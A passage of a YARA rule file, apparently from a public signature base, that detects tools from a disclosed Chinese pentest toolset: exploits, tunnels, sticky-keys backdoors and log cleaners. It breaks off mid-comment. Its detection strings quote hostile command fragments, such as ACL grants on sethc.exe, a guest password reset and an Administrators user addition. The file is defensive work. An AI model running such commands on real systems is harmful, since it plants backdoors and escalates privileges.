        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "0b3c5015ba3616cbc616fc9ba805fea73e98bc83"
        id = "79195823-f88b-5c28-8b99-a43a9d6c94af"
    strings:
        $s0 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
        $s1 = "(http://www.eyuyan.com)" fullword wide
        $s2 = "GetConnectString" fullword ascii /* PEStudio Blacklist: strings */
        $s4 = "#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and all of them
}
rule CN_Honker_Htran_V2_40_htran20 {
    // htran20.exe from the toolset: six usage/status messages, all required.
    // Stricter than CN_Honker_lcx_lcx (the other HTRAN rule in this set),
    // which accepts any single string.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file htran20.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
        id = "9dd1ab4b-108e-55be-b94d-2868ce00855e"
    strings:
        $s1 = "%s -slave ConnectHost ConnectPort TransmitHost TransmitPort" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "[SERVER]connection to %s:%d error" fullword ascii /* PEStudio Blacklist: strings */
        $s4 = "%s -connect ConnectHost [ConnectPort] Default:%d" fullword ascii /* PEStudio Blacklist: strings */
        $s5 = "[+] got, ip:%s, port:%d" fullword ascii /* PEStudio Blacklist: strings */
        $s6 = "[-] There is a error...Create a new connection." fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and all of them
}
rule CN_Honker_DictionaryGenerator {
    // DictionaryGenerator.exe from the toolset. $s2 ("cracker") is a
    // generic word; both strings are required, so $s1 carries the match.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "b3071c64953e97eeb2ca6796fab302d8a77d27bc"
        id = "29ce6f8c-3092-5917-ab31-aaed7834c500"
    strings:
        $s1 = "`PasswordBuilder" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "cracker" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 3650KB and all of them
}
rule CN_Honker_ms11080_withcmd {
    // ms11080_withcmd.exe from the toolset: a usage line and an error
    // message. Both must be present.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file ms11080_withcmd.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "745e5058acff27b09cfd6169caf6e45097881a49"
        id = "38c12697-7e52-5713-a566-6047abfa229b"
    strings:
        $s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "[>] create pipe error" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 340KB and all of them
}
rule CN_Honker_T00ls_Lpk_Sethc_v2 {
    // "T00ls Lpk Sethc v2.exe" from the toolset.
    // NOTE(review): $s1 and $s2 look like generic loader/packer stub
    // messages that many packed binaries carry; $s3 is the distinguishing
    // copyright marker. All three are required, which keeps the rule specific.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v2.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "a995451d9108687b8892ad630a79660a021d670a"
        id = "499b251a-e0e1-5550-825d-acab112be74b"
    strings:
        $s1 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "2011-2012 T00LS&RICES" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 800KB and all of them
}
rule CN_Honker_HASH_32 {
    // 32.exe from the toolset (HASH directory): three console messages,
    // all required.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file 32.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "bf4a8b4b3e906e385feab5ea768f604f64ba84ea"
        id = "a9b5b753-2028-53be-9ac8-50ec910860c3"
    strings:
        $s5 = "[Undefined OS version] Major: %d Minor: %d" fullword ascii
        $s8 = "Try To Run As Administrator ..." fullword ascii /* PEStudio Blacklist: strings */
        $s9 = "Specific LUID NOT found" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 240KB and all of them
}
rule CN_Honker_windows_mstsc_enhanced_RMDSTC {
    // RMDSTC.exe from the toolset: two author/contact strings from the
    // version resource. Both must be present.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file RMDSTC.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "3ca2b1b6f31219baf172abcc8f00f07f560e465f"
        id = "f6e94327-cb79-5a7a-88bb-850177558978"
    strings:
        $s0 = "zava zir5@163.com" fullword wide
        $s1 = "By newccc" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 400KB and all of them
}
rule CN_Honker_sig_3389_mstsc_MSTSCAX {
    // MSTSCAX.DLL from the toolset (a modified RDP ActiveX client).
    // NOTE(review): $s2 reads like a string from the stock Microsoft
    // component; $s1 and $s3 are presumably the added-code markers. Verify
    // against an unmodified MSTSCAX.DLL before treating a hit as tampering.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file MSTSCAX.DLL"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "2fa006158b2d87b08f1778f032ab1b8e139e02c6"
        id = "9508b613-f897-5277-97e0-30e36fb5d747"
    strings:
        $s1 = "ResetPasswordWWWx" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "Terminal Server Redirected Printer Doc" fullword wide /* PEStudio Blacklist: strings */
        $s3 = "Cleaning temp directory" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and all of them
}
rule CN_Honker_T00ls_scanner {
    // T00ls_scanner.exe from the toolset: a search-engine query template and
    // a team banner. Both must be present.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file T00ls_scanner.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "70b04b910d82b32b90cd7f355a0e3e17dd260cb3"
        id = "80d4a950-24cb-55c7-903f-8788a71be7ac"
    strings:
        $s0 = "http://cn.bing.com/search?first=1&count=50&q=ip:" fullword wide
        $s17 = "Team:www.t00ls.net" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 330KB and all of them
}
rule CN_Honker_GetHashes {
    // GetHashes.exe from the toolset: SAM hive reading messages. Any 2 of 3
    // fire; each string is a full sentence specific to this tool's output.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "dc8bcebf565ffffda0df24a77e28af681227b7fe"
        id = "b1c5910d-0fb1-547e-92b7-5fcf183e38a6"
    strings:
        $s0 = "SAM\\Domains\\Account\\Users\\Names registry hive reading error!" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "GetHashes <SAM registry file> [System key file]" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "Note: Windows registry file shall begin from 'regf' signature!" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 87KB and 2 of them
}
rule CN_Honker_hashq_Hashq {
    // Hashq.exe from the toolset: executable name, vendor string and the
    // tool's self-description. All three required.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Hashq.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "7518b647db5275e8a9e0bf4deda3d853cc9d5661"
        id = "4f435edf-28bf-5195-bc22-0d2a7302b312"
    strings:
        $s1 = "Hashq.exe" fullword wide
        $s5 = "CnCert.Net" fullword wide
        $s6 = "Md5 query tool" fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 600KB and all of them
}
rule CN_Honker_ShiftBackdoor_Server {
    // Server.dat from the toolset (sticky-keys replacement component).
    // Any 2 of 4 fire. Useful detection context: the strings reference the
    // accessibility binary sethc.exe and its dllcache copy, which is what a
    // defender would expect to see touched by this technique.
    // NOTE(review): $s0 has no path separators between "%systemroot%",
    // "system32" and "sethc.exe" while $s2 keeps its backslashes; confirm
    // $s0 appears this way in the sample and is not a lost-escape artefact.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Server.dat"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "b24d761c6bbf216792c4833890460e8b37d86b37"
        id = "c53f4015-ad2b-5898-88b5-34b3bc2c65b6"
    strings:
        $s0 = "del /q /f %systemroot%system32sethc.exe" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "cacls %s /t /c /e /r administrators" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "\\dllcache\\sethc.exe" ascii
        $s3 = "\\ntvdm.exe" ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and 2 of them
}
rule CN_Honker_exp_win2003 {
    // win2003.exe from the toolset: usage, success and OS-check messages.
    // All three required.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file win2003.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "47164c8efe65d7d924753fadf6cdfb897a1c03db"
        id = "f64e14dd-714c-5a0f-923d-23a584fe605f"
    strings:
        $s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "The shell \"cmd\" success!" fullword ascii /* PEStudio Blacklist: strings */
        $s4 = "Not Windows NT family OS." fullword ascii /* PEStudio Blacklist: os */
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and all of them
}
rule CN_Honker_Interception3389_setup {
    // setup.exe from the toolset (Interception3389). All five strings
    // required. $s0 is a Winlogon Notify registry path template and $s7 the
    // dropped DLL name — both are useful pivots for host-based hunting.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file setup.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f5b2f86f8e7cdc00aa1cb1b04bc3d278eb17bf5c"
        id = "7250ff73-6b08-56a4-b2bc-081060d1fa2d"
    strings:
        $s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\%s" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "%s\\temp\\temp%d.bat" fullword ascii /* PEStudio Blacklist: strings */
        $s5 = "EventStartShell" fullword ascii /* PEStudio Blacklist: strings */
        $s6 = "del /f /q \"%s\"" fullword ascii
        // Not fullword: matches as a path suffix.
        $s7 = "\\wminotify.dll" ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 400KB and all of them
}
|
||
|
|
||
|
/*
   CnCerT.CCdoor.CMD.dll2: a very small (< 22KB) command-execution plugin DLL,
   matched on its module name and export-like names. The misspelling in
   "ExcuteCmd" is part of the artifact and must not be "corrected".
*/
rule CN_Honker_CnCerT_CCdoor_CMD_2 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll2"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "7f3a6fb30845bf366e14fa21f7e05d71baa1215a"
        id = "2681a989-6504-5ac7-abc9-e6dad2a052c5"
    strings:
        $s0 = "cmd.dll" fullword wide
        $s1 = "cmdpath" fullword ascii
        $s2 = "Get4Bytes" fullword ascii
        $s3 = "ExcuteCmd" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 22KB and all of them
}

/*
   ms11046.exe: privilege-escalation exploit matched on its progress messages
   (token use, local user creation, Administrators group addition). $s1 and $s2
   are also used by CN_Honker_exp_ms11080, so the two rules can fire together
   on the same file. $s3 is a generic MSVC runtime string (seen in goodware)
   and only adds value because the condition requires all strings.
*/
rule CN_Honker_exp_ms11046 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file ms11046.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"
        id = "aafb45f4-3b42-5c8f-8c25-40fd01217e9d"
    strings:
        $s0 = "[*] Token system command" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "[*] command add user 90sec 90sec" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "[*] Add to Administrators success" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 3 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and all of them
}

/*
   Master_beta_1.7.exe: matched on a hard-coded SEO lookup URL and an ASP
   redirect fragment. Only two strings, both required; the URL host could in
   principle appear in unrelated tooling, so the redirect string carries the
   specificity.
*/
rule CN_Honker_Master_beta_1_7 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Master_beta_1.7.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "3be7a370791f29be89acccf3f2608fd165e8059e"
        id = "78f904ec-f7cb-5fd0-a117-925ebedd1d3e"
    strings:
        $s1 = "http://seo.chinaz.com/?host=" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "Location: getpass.asp?info=" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 312KB and all of them
}

/*
   f4ck_2.exe: matched on group/branding strings plus a Netapi32 import hint.
   Condition is "2 of them": note that $s8 ("Administrators") is a common
   goodware string, so $s8 paired with only $s2 can satisfy the rule; hits
   that lack any of the F4ck-branded strings deserve a second look.
*/
rule CN_Honker_F4ck_Team_f4ck_2 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file f4ck_2.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "0783661077312753802bd64bf5d35c4666ad0a82"
        id = "b2a9067f-57d0-5b32-87c8-3b635c3944a5"
    strings:
        $s1 = "F4ck.exe" fullword wide
        $s2 = "@Netapi32.dll" fullword ascii
        $s3 = "Team.F4ck.Net" fullword wide
        $s8 = "Administrators" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 14 times */
        $s9 = "F4ck Team" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 220KB and 2 of them
}

/*
   AntiFW.exe: the status strings show Terminal Services being re-bound to
   port 80 through a temporary .reg import (amethyst.reg), i.e. RDP exposed on
   a port firewalls usually allow. "2 of them" on a tiny (< 30KB) PE; the
   source-file name $s5 alone does not trigger.
*/
rule CN_Honker_sig_3389_80_AntiFW {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file AntiFW.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "5fbc75900e48f83d0e3592ea9fa4b70da72ccaa3"
        id = "761bed41-e8e6-585b-8fde-a6b6a56445d6"
    strings:
        $s1 = "Set TS to port:80 Successfully!" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "Now,set TS to port 80" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "echo. >>amethyst.reg" fullword ascii
        $s4 = "del amethyst.reg" fullword ascii
        $s5 = "AntiFW.cpp" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 30KB and 2 of them
}

/*
   wwwscan_gui.exe: web path scanner GUI. $s1 (the example command line) is
   shared with CN_Honker_WebScan_wwwscan; $s2 is a wordlist entry that makes
   this rule specific to the GUI build. Both strings are required.
*/
rule CN_Honker_wwwscan_gui {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file wwwscan_gui.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
        id = "fffed806-4394-505a-96bd-50bf6f24aefc"
    strings:
        $s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "/eye2007Admin_login.aspx" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 280KB and all of them
}

/*
   SwordCollEdition.exe: matched on the YuJianScan product name in both wide
   and ascii form. Presumably the "Yu Jian" web directory scanner; it is a
   widely shared tool, so treat a hit as tooling presence rather than as
   evidence of a specific actor.
*/
rule CN_Honker_SwordCollEdition {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file SwordCollEdition.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "6e14f21cac6e2aa7535e45d81e8d1f6913fd6e8b"
        id = "4e8d4d48-c053-5579-be9c-af73ec0fe614"
    strings:
        $s0 = "YuJianScan.exe" fullword wide /* PEStudio Blacklist: strings */
        $s1 = "YuJianScan" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 225KB and all of them
}

/*
   HconSTFportable.exe: matched on the executable name and the Hcon.in site
   string. Presumably the publicly distributed HconSTF testing framework; this
   is dual-use software, so expect hits on security/admin workstations and
   weigh them by context (host role, user) rather than by the rule alone.
*/
rule CN_Honker_HconSTFportable {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file HconSTFportable.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "00253a00eadb3ec21a06911a3d92728bbbe80c09"
        id = "591cbd4a-0035-5903-a7dc-8f8ee6dc9f50"
    strings:
        $s1 = "HconSTFportable.exe" fullword wide /* PEStudio Blacklist: strings */
        $s2 = "www.Hcon.in" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 354KB and all of them
}

/*
   LPK.DAT (T00ls Lpk Sethc v3): a sethc.exe (Sticky Keys) replacement /
   backdoor helper, recognisable from the cacls-style ACL change on sethc.exe
   and the user/group error text. $s2 is shared with CN_Honker_LPK2_0_LPK,
   which covers a different LPK.DAT hash; all four strings are required here.
*/
rule CN_Honker_T00ls_Lpk_Sethc_v3_LPK {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "cf2549bbbbdb7aaf232d9783873667e35c8d96c1"
        id = "c5b806d9-74dc-5244-b1e0-9837abeaeaac"
    strings:
        $s1 = "FreeHostKillexe.exe" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "\\sethc.exe /G everyone:F" ascii /* PEStudio Blacklist: strings */
        $s3 = "c:\\1.exe" fullword ascii /* PEStudio Blacklist: strings */
        $s4 = "Set user Group Error! Username:" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 400KB and all of them
}

/*
   Wywz.exe ("without a trace"): anti-forensics helper. Strings show a
   Norton Personal Firewall log path, an embedded config/proxy update line,
   and a subinacl.exe invocation granting Everyone full control on registry
   keys. Large size bound (< 1800KB); all three strings required.
*/
rule CN_Honker_Without_a_trace_Wywz {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Wywz.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f443c43fde643228ee95def5c8ed3171f16daad8"
        id = "1093c0c3-499f-5aec-ad4a-878d377296d5"
    strings:
        $s1 = "\\Symantec\\Norton Personal Firewall\\Log\\Content.log" ascii /* PEStudio Blacklist: strings */
        $s2 = "UpdateFile=d:\\tool\\config.ini,Option\\\\proxyIp=127.0.0.1\\r\\nproxyPort=808" ascii /* PEStudio Blacklist: strings */
        $s3 = "%s\\subinacl.exe /subkeyreg \"%s\" /Grant=%s=f /Grant=everyone=f" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 1800KB and all of them
}

/*
   LPK.DAT (LPK 2.0): sethc.exe backdoor helper. Strings cover the ACL change
   on sethc.exe, a hard-coded guest-account password reset, the dllcache copy
   of sethc.exe and a misspelt "sathc.exe" marker. $s1 is shared with
   CN_Honker_T00ls_Lpk_Sethc_v3_LPK; all four strings are required here.
*/
rule CN_Honker_LPK2_0_LPK {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "5a1226e73daba516c889328f295e728f07fdf1c3"
        id = "4aa40b78-5fe4-5312-881c-e5a292435ff0"
    strings:
        $s1 = "\\sethc.exe /G everyone:F" ascii /* PEStudio Blacklist: strings */
        $s2 = "net1 user guest guest123!@#" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "\\dllcache\\sethc.exe" ascii
        $s4 = "sathc.exe 211" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1030KB and all of them
}

/*
   cleaniis.exe: IIS log cleaner ("iisantidote"), matched on its usage line
   and author banner. Anti-forensics tooling; a hit should prompt a check of
   IIS log integrity on the host. Both strings required.
*/
rule CN_Honker_cleaniis {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file cleaniis.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "372bc64c842f6ff0d9a1aa2a2a44659d8b88cb40"
        id = "75f3c33a-e3b8-57bc-a3fd-f8b6491388d8"
    strings:
        $s1 = "iisantidote <logfile dir> <ip or string to hide>" fullword ascii /* PEStudio Blacklist: strings */
        $s4 = "IIS log file cleaner by Scurt" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and all of them
}

/*
   arp3.7.exe: both strings actually reference "CnCerT.Net.SKiller.exe" and
   the 80sec site, not an ARP tool, so the description may describe the
   archive name rather than the binary's own branding — worth confirming
   against the hash. Generous size bound (< 4000KB); both strings required.
*/
rule CN_Honker_arp3_7_arp3_7 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file arp3.7.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "db641a9dfec103b98548ac7f6ca474715040f25c"
        id = "a4aeefaf-a097-5ba3-a18f-54a1b9752883"
    strings:
        $s1 = "CnCerT.Net.SKiller.exe" fullword wide /* PEStudio Blacklist: strings */
        $s2 = "www.80sec.com" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 4000KB and all of them
}

/*
   ms11080.exe: privilege-escalation exploit matched on two progress messages.
   Both strings are also in CN_Honker_exp_ms11046; because this rule needs
   only these two, any file matching ms11046 and under 840KB matches here as
   well. Treat the two as a family signal rather than as distinct samples.
*/
rule CN_Honker_exp_ms11080 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file ms11080.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
        id = "2f5ce2f3-3595-5729-be0c-3f6486cb94fd"
    strings:
        $s2 = "[*] command add user 90sec 90sec" fullword ascii /* PEStudio Blacklist: strings */
        $s6 = "[*] Add to Administrators success" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 840KB and all of them
}

/*
   Injection_transit.exe: SQL-injection relay tool. $s0 is a stock application
   manifest placeholder and $s4 a vendor copyright, both of which can occur in
   unrelated software; the specificity rests on $s5 and on requiring all
   three. Its meta id is reused by CN_Honker_Injection (see that rule).
*/
rule CN_Honker_Injection_transit {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Injection_transit.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f4fef2e3d310494a3c3962a49c7c5a9ea072b2ea"
        id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
    strings:
        $s0 = "<description>Your app description here</description> " fullword ascii /* PEStudio Blacklist: strings */
        $s4 = "Copyright (C) 2003 ZYDSoft Corp." fullword wide /* PEStudio Blacklist: os */
        $s5 = "ScriptnackgBun" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 3175KB and all of them
}

/*
   Safe3WVS.EXE: web vulnerability scanner, matched on its product name and
   vendor site plus three generic .NET/COM-registration strings. The generic
   ones ($s0, $s1, $s20) are only meaningful because all strings are required.
   Dual-use scanner; a hit means the tool is present, not that it was misused.
*/
rule CN_Honker_Safe3WVS {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Safe3WVS.EXE"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "fee3acacc763dc55df1373709a666d94c9364a7f"
        id = "035ecb73-3dbc-55d2-8d0c-b71308094d18"
    strings:
        $s0 = "2TerminateProcess" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "mscoreei.dll" fullword ascii /* reversed goodware string 'lld.ieerocsm' */
        $s7 = "SafeVS.exe" fullword wide
        $s8 = "www.safe3.com.cn" fullword wide
        $s20 = "SOFTWARE\\Classes\\Interface\\" ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}

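/*
   NBSI 3.0.exe: MSSQL injection tool, matched on embedded T-SQL fragments
   (sp_oacreate / xp_cmdshell) and a default test URL.

   Fix: the original rule declared the same sp_oacreate payload twice ($s1 and
   $s4). With "2 of them", one occurrence of that string satisfied both
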